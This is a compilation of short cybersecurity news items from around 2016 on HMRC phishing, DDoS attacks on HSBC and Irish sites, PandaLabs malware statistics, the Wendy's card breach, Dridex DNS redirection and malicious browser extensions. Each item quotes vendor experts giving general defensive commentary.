HMRC Phishing Messages Still a Threat with personal information and credentials the target

As the Self Assessment Tax Return deadline looms in the UK, PhishMe has warned of phishing messages, purporting to be from HM Revenue and Customs (HMRC) circulating. While the number of campaigns* circulating in 2015 has decreased against previous years, the messages themselves still pose a threat due to their sophisticated and devious nature. It’s worth noting a recent deviation is, instead of spreading malware, the scammers are trying to directly spoof individuals into handing over their personal information.

The research team at PhishMe has seen a great number of these phishing emails in the last several years according to threat analysts Ronnie Tokazowski, Heather McCalley and Brendan Griffin.  Ronnie explains, “HMRC spoofed messages have been circulating for a number of years. With the deadline for self-assessment in the UK this weekend, the opportunity for scammers to spoof unsuspecting individuals under pressure to file their return before the cut-off point is a real possibility once again. In recent months we’ve seen two separate HMRC inspired campaigns circulating that were both used to deliver a malware known as Pony – a password stealer; and a key-logger – that records what a person types on the keyboard. In 2015 there was a definite spike in HMRC messages during the first four months of the year and, while data is still being collected for 2016, we envisage that spammers will be looking to capitalise on the UK’s tax season once again”

Once the deadline has passed, scammers often change tactics and will try to spoof users with messages of rebates. A theme PhishMe has already seen tried according to Heather: “Last February, scammers adapted their messages with the promise of a refund as a result of overpaid tax. However, instead of secreting malware, the messages were a credential phish seeking to collect personal information under the guise of HMRC contact. The recipient’s encouraged to complete the return to claim the rebate; however, having completed the file and ‘submitting’ the form, all the details are delivered to the cyber-criminals via the Internet – and not HMRC. From this point, instead of receiving money, it’s likely that the criminals will use the collected data to use the person’s identity for illicit gain.”

Heather continues, “Of course, it isn’t just tax season when HMRC scams circulate. A few months back, in November, we saw a campaign circulating where the criminals had spent time creating a spoof HMRC website that was quite intricate and looked legitimate to the untrained eye. The underlying code of the page caused the information entered to be delivered once again to fraudsters.”

Brendan concludes, “Phishers are continuously looking for ways to spread malware and collect personal information that they can monetise. In fact, while a Visa or MasterCard is worth $4 on the black market, a person’s date of birth can be traded for as much as $11. If a criminal has the complete package – so National Insurance number, date of birth and credit card details – as the scams above tried to collect, that can fetch $30.”

If you receive a message, and are unsure of its legitimacy, HMRC has advice for recognising phishing emails and a list of genuine HMRC digital and other contact it has issued here:

* A ‘campaign’ refers to each unique wave of an email and not the volume of messages circulating. In 2015, PhishMe Identified 22 ‘campaigns’ compared with 38 in 2014 – a 40% decrease. Despite these small numbers, the values are still statistically significant. 




HSBC hit by DDoS attack. How safe is your bank account?

Earlier today, it was reported that banking giant HSBC had been hit by a distributed denial-of-service attack (DDoS) against its systems, stopping users from accessing their online accounts.

Robert Capps, VP of business development at NuData Security, answered some questions regarding the attack.

How safe is your bank account?

“It’s incredibly important to understand that Distributed Denial of Service attacks (DDoS) are not direct attacks on the accounts at financial institutions, they are attacks on the public image and consumer good will towards those institutions.  They are meant to harass, intimidate and embarrass a targeted institution, but the DDoS attacks rarely result in any last lasting impact on individual accounts at an institution.”

How safe is online banking?

“Online banking is still incredibly safe for individual consumers, and brings with it a level of convenience and direct visibility that has long been absent from traditional banking channels.  At one time, you may not have known about improper access or transactions on a financial account, until the bill or statement came at the end of the month.  DDoS attacks are not attacks meant to directly steal from consumers, they are meant to deny them access to the institution in one of the most convenient and consumer friendly ways methods we’ve devised, to date.  It’s important to understand that bank accounts remain available via other channels, even during a crushing DDoS attack, and consumers may visit a bank branch, place a phone call to their bank, or use their normal payment cards, during such an attack.”

How safe are modern bank accounts?

“They are incredibly safe, and with the deployment on modern and emerging security features, are becoming even safer. As we make access to financial institutions even more convenient to the average consumer, we also make attacking them much easier for an individual or group with malicious intent.  While the later is unwanted, it’s a cost of creating an open and accessible financial system that allows for the growth and prosperity we’ve witnessed over the last 20 years.”

What sort of systems are in place to protect them and are they vulnerable?

“Sadly, there are few effective systems to fully protect institutions from the effects of a DDoS attack.  This is an unfortunate by-product of how the Internet itself was designed decades ago.  The reality of the situation is that the tools available to commit such an attack are available to a marginally sophisticated attacker, for a few hundred dollars, and a few hours of their time.

There are a few additional issues to be worried about beyond the initial impact to the image of an Online Institution during a DDoS attack.  In recent years, we’ve seen DDoS attacks against banks used as a smoke screen and cover for other nefarious activities such as cyber-heists at a targeted institution.  They are sometimes meant to draw away the attention of the information security teams of a financial institution from the real intent of the attacks, such as large value money transfers, or the bulk theft and removal of consumer account data.  Only time will tell if the HSBC cyber attack is simply a DDoS attack or a cover for a much more damaging intrusion in to their systems.”



27% of all recorded malware appeared in 2015

PandaLabs, the R&D laboratory of Panda Security, both detected and neutralized more than 84 million new malware samples throughout 2015. This is nine million more than the year previous, according to the corresponding data. The figure means that there were 230,000 new malware samples produced daily over the course of the year.

Last year saw the greatest number of cyberattacks recorded around the world, with a total of 304 million samples, which means that more than a quarter of all malware samples ever recorded were produced in 2015 (27.63%).

It was also a difficult year for multinational companies and governments alike who suffered large scale data theft and interference on their IT systems.

“We predict that the amount of malware created by cybercriminals will continue to grow”, says Luis Corrons, Technical Director of PandaLabs, “we also can’t forget that the creation of millions of Trojans and other threats corresponds to the cybercriminals’ needs to infect as many users as possible in order to get more money”.

Most powerful malware of 2015: Trojans and PUPs.

In 2015 we saw that Trojans, PUPs (Potentially Unwanted Programs) and distinct families of Cryptolocker spread fear among larger businesses worldwide through massive attacks and the theft of thousands of confidential files.

Trojans continued to be the main source of malware (51.45%), comfortable positioned ahead of the rest of the collected samples: viruses (22.79%), followed by worms (13.22%), PUPs (10.71%), and cases of Spyware (1.83%).

Cryptolocker (a type of ransomware) was the main protagonist of cyberattacks throughout the year, according to Corrons, “Cryptolocker is the best bet for cybercriminals, as it is one of the easiest ways of getting money. Also, it has shown itself to be very effective, especially in the case of businesses that don’t think twice about paying to recover their stolen information”.

Biggest infections caused by Trojans

Among all types of malware that cause large infections worldwide, it was Trojans that had the greatest rate of infection (60.30%), albeit 5% down on the figure from 2014.

PUPs were also particularly harmful, with nearly a third of infections resorting to trick techniques to fully enter the targeted PCs, far ahead of Adware / Spyware (5.19%), worms (2.98%), and viruses (2.55%).

China remains one of the most infected countries in the world

Last year was notable for being the year with the highest rate of infections caused on computers. On a geographic level, China was the country with the most infected computers (57.24%), a figure that was nearly 30% more than in 2014. Taiwan was next, with an infection rate of 49.15%, followed by Turkey (42.52%). These three countries remain at the top of the infection rate rankings, just as they were in 2014 and 2013.

Other countries that registered an infection rate that was above the global average included Colombia (33.17%), Uruguay (32.98%), and Spain (32.15%).

Nordic countries register the lowest rate of infection

According to the information gathered regarding countries with the lowest rates of infection, nine of them were in Europe, with Japan being the only country not located in the continent.

The Nordic countries occupied the top positions: Finland was ahead of the rest, with a rate of 20.32%, followed by Norway (20.51%) and Sweden (20.88) – then the UK at 21.34%.

The year at a glance, and trends for 2016

PandaLabs has noted while Flash player is gradually begin fazed out of use other attack methodologies are always willing to fill the gap. Advanced phishing, social media, mobiles, the IoTs and cyber-espionage are covered in more detail on this section of the PandaLabs report.

The full PandaLabs 2015 Annual report is attached and more information can be found at



Wendy’s reports possible credit card breaches at multiple restaurants

In response to last night’s news of a customer data breach at Wendy’s, George Rice, senior director, payments at HPE Security-Data Security, commented:

“More than ever, retailers must put data security at the top of their priority lists. Common approaches to security may no longer be secure as criminals are armed with increasingly effective malware and hacking tools. At the same time, retail innovations such as EMV, mobile payments and mobile wallets enhance the customer experience but may also introduce security vulnerabilities for the merchant.

Retailers should develop security strategies that meet the highest cryptographic standards, are easy to maintain and allow for continuous advancement of the merchant’s payment ecosystem.

We recommend a data-centric approach to data security that uses format preservation. This allows for sensitive data to be protected at the moment of acceptance and remain protected throughout its lifecycle in the organisation.

Retail malware is typically designed to steal clear data in memory from Point of Sale (POS) applications, resulting in the loss of magstripe data, EMV card data or other sensitive data exposed at the point of sale. And unfortunately, POS systems are often the weak link in the chain — they should be isolated from other networks, but often are connected. A checkout terminal in constant use is usually less frequently patched and updated, and is thus vulnerable to all manner of malware compromising the system to gain access to cardholder data.

Fast food, and any businesses using POS systems, can avoid the impact of these types of advanced attacks. Proven methods are available to neutralize data from breaches either at the card reader, at the point of sale, in person or online. Leading retailers and payment processors have adopted these data-centric security techniques with huge positive benefits: reduced exposure of live data from the reach of advanced malware during an attack, and reduced impact of increasingly aggressive PCI DSS 3.1 compliance enforcement laws, laws aimed at making data security a ‘business as usual’ matter for any organization handling card payment data.

The good news is that savvy merchants are already tackling this risk and giving the malware nothing to steal through solutions that also have a dramatic cost reducing benefit to PCI compliance. Encrypting the data in the card reading terminal ahead of the POS eliminates the exposure of live information in vulnerable POS systems. The attackers get only useless encrypted data.”

Rice offers these tips for retailers:

“Only collect customer data that you need and can adequately protect. Why do you need date-of-birth or social security numbers, for example? Encrypt or tokenize everything you determine to be mission-critical.

Protect data at the moment of submission by the customer. Criminals know to embed malware near to data acceptance points, like point-of-sale systems or web front-ends.

Only unprotect data when absolutely necessary.  A high percentage of the time, applications and users can work equally well with a surrogate value.”

Simon Crosby, CTO and co-founder at Bromium, added:

“Many Point of Sale systems have not been upgraded for years, and in anticipation of “chip and sign” changes to credit cards, some vendors have held off even longer, waiting for the latest technology before they upgrade. A simple rule of thumb: If a vendor does not support chip and sign, pay cash”



Newly published report from BSI can help prepare for the future of Big Data

BSI, the business standards company, has published a Big Data research report to establish the role that standards can play in this emerging market. The Centre for Economic and Business Research (CEBR) estimates that Big Data will benefit the UK economy to the tune of £216 billion by 2017 and result in the creation of 58,000 new jobs.

Organizations have always produced large quantities of data, but the economically-viable ability to store and analyse exponentially growing volumes of data is new, and this is what the term “Big Data” represents. There is very little standardization activity in this area. To address this, external research conducted by Circle Research examined the market for Big Data standards. This included mapping the current Big Data market to identify high potential industries where there is a need for best practice, in addition to qualitative research comprising interviews with industry professionals, academics, government representatives and consumer bodies. The report also features pertinent quotes from organizations contacted for the study.

The report identified a series of challenges for the growth of the Big Data market which also represent an opportunity to develop standardization in this area.

Anne Hayes, Head of Market Development for Governance & Risk at BSI said: “There are a series of challenges that organizations carrying out Big Data projects are facing. This research has developed a list of areas where there is initial agreement that the UK can take the lead on developing impactful best practice. BSI will work with key stakeholders in the UK and internationally to develop standard to help UK organizations reap the benefits of Big Data.”

Potential areas of standardization:

How to’ guide for Big Data projects. This would include best practice to help formulate projects, determine who should be involved, define the objectives and ensure quality checks are in place.

Meta-data. The importance of meta-data is generally seen to be growing in importance however, many organizations struggle to capture and store meta-data in a usable and consistent format. Furthermore, there is a lack of guidance on areas such as how to ensure meta-data quality and how long it should be stored for. 

Big Data communications.  In recent years there have been cases of Big Data initiatives failing to take-off due to public resistance. Many experts believe the problem lies in a failure to adequately explain to customers/the public the potential societal benefits of using Big Data analytics. Standardization could help to develop best practice for how Big Data initiatives should be explained and communicated to ensure a positive case for Big Data is presented to the public.

Terms and conditions. Building public trust in the use of their data is essential. However, T&Cs are often confusing, ambiguous and wordy. Any organization with  clear and easy to understand T&Cs will be at a competitive advantage. Standards could help by ensuring T&Cs are simple to understand and optimize informed consent prior to data being used in Big Data projects.

The full report is available to download here.



Irish National Lottery website and ticket machines were targeted by a cyber-attack

The Irish National Lottery website and ticket machines were targeted by a cyber-attack to disrupt operations. The investigations into the incident are still ongoing. Dave Larson, Chief Operating Officer of Corero Network Security provided the following expert opinion to @DFMag;

“Denial of Service attacks have been a threat to service availability for more than a decade. However, more recently these attacks have become increasingly sophisticated and multi-vector in nature, overcoming traditional defense mechanisms or reactive countermeasures.

“The growing dependence on the Internet makes the impact of successful DDoS attacks – financial and otherwise – increasingly damaging. The gaming, and gambling sectors would appear to be higher risk targets, due to the nature of the business. 

“Enterprises must then harden the network edge against such attacks. Automatic detection and mitigation of attack traffic allows online properties and technical infrastructure to remain available in the wake of a DDoS event.” 



New twist to Dridex banking malware

It has been discovered that an updated Dridex banking malware is using a Domain Name System trick to direct victims to fake banking websites. Even if a user types in the correct domain name for a bank, the fake website is still shown in the browser.

Tim Erlin, Director of IT Security and Risk Strategy for Tripwire says, “We implicitly trust that the address we type into the browser is the website we get, but DNS redirection exploits that trust. There are, in fact, multiple systems involved in turning that web address into an actual destination for your requests. The best way to prevent this kind of attack is to avoid the initial malware infection. While the malware itself may be advanced, the initial infection occurs via simple phishing.”



Multiple Irish government websites downed under DDoS attack

A number of Irish government-related and public sector websites were knocked offline by an apparent DDoS attack, Stephanie Weagle, Senior Director of Corero Network Security, a company that specialises in mitigating DDoS attacks told @DFMag:

“The Irish Government Infrastructure appears to be the target of cyber attack activity, specifically Malicious DDoS events, impacting a variety of public sector website properties, rendering then inaccessible.

“Motivations for DDoS attacks are so wide ranging and sometimes random in nature. Regardless of the stimulus, the impact can be wide quite damaging. Traditional security solutions are no match for most DDoS attack vectors. Proactive and automatic DDoS protection should be a required layer of security for an enterprise infrastructure.

“In addition, DDoS are increasingly being used as a smokescreen to hide even more malicious activity on the network. This should be a concern for the teams dealing with the attacks against the Irish Government network infrastructure.”



Browser Extensions are Prime Targets in the Threat Landscape

Craig Young, Cybersecurity Researcher for Tripwire says, “With so many critical business and financial activities occurring within the web browser, malicious extensions and add-ons must be considered a prime target for infection.  

As with browser interstitials warning of invalid SSL certificates, many users likely gloss over the permissions declaration when installing extensions or do not recognize the risk of allowing an extension to have access to read data from web sites.  The reality though is that extensions are allowed to run in a very privileged browser context giving access to authentication tokens as well as the ability to scan local networks.  Normally sites loaded within the browser are restricted from reading content from other sites via the same-origin policy.  This is what keeps an advertisement on a news site from transferring money out of the banking site open in another tab.  

Recently a number of gamers on the Steam platform learned this lesson the hard way as a number of malicious browser extensions were found to be stealing in-game items with real-world value.

Security organizations should educate employees on the risks of running browser extensions as well as auditing workstations for unapproved use.” 



Kickass Torrents hit with DDoS attack

Kickass Torrents, the Internet’s biggest torrent portal has suffered intermittent downtime over the last few days after an unknown attacker has pummelled the site with a DDoS attack.

Dave Larson, Chief Operating Officer at Corero Network Security told @DFMag;

“This attack is a perfect example of the vulnerability of Domain Name Services when targeted with precision DDoS attacks.  DNS servers are central to the operation of the Internet at large and in many cases there is nothing standing between them and the raw Internet.  Organizations need to ensure that their own operated DNS servers, as well as the services they contract for with third party providers, are defended by always-on, in-line, automatic DDoS defense systems that can meet this challenge with a real-time response.  Otherwise, these systems represent an easy target to enable attackers to achieve significant outages with focused attacks.”